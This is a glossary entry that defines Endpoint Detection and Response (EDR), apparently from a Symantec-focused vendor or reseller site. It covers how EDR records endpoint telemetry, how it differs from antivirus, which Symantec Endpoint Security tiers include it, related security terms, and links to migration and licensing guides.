Definition
Endpoint Detection and Response (EDR) records endpoint activity at the kernel and process level - file operations, registry writes, process spawns, network connections, command-line invocations - and applies detection content (behavioral rules, indicators of compromise, ML models) to identify malicious activity. Unlike traditional antivirus which blocks known-bad signatures, EDR assumes some threats will get through prevention and focuses on detecting, investigating, and responding to them after entry. Modern EDR includes retention (typically 30-90 days of process telemetry), threat hunting workspaces (analyst-driven queries across endpoints), and response actions (kill process, isolate host, retrieve forensic data). Symantec Endpoint Security Complete includes a full EDR module - competitive with CrowdStrike Falcon Insight and SentinelOne Singularity. Base SES SKUs do not include EDR; the upgrade to SES Complete is a common reason for SEPM-to-SES migrations.
Symantec products that implement this
- Symantec Endpoint Security - AI-driven malware prevention, EDR, application control, and device control across every endpoint - Windows, macOS, Linux, mobile. Cloud-managed (SES Complete) or on-prem (SEPM).
Related terms
- XDR (Extended Detection and Response) - Detection and response that correlates telemetry across endpoint, network, email, identity, and cloud - beyond EDR's endpoint-only scope.
- SIEM (Security Information and Event Management) - Platform that aggregates security events from across the environment for correlation, search, and alerting.
- SOC (Security Operations Center) - Centralized team responsible for monitoring, detecting, investigating, and responding to security incidents.
- MITRE ATT&CK - Open framework documenting adversary tactics and techniques observed in real-world attacks.
Deep-dives on EDR
- Migrating SEPM 14.x to SES Complete: the engineer's playbook - A real-world playbook for moving from on-prem SEPM 14.x to cloud-managed SES Complete. Discovery, tenant prep, agent conversion, policy migr…
- Symantec licensing in 2026: what each SKU includes (and what it does not) - The Broadcom licensing model for Symantec products is dense. A buyer-side guide to what is actually included in SES Complete, DLP, Cloud SWG…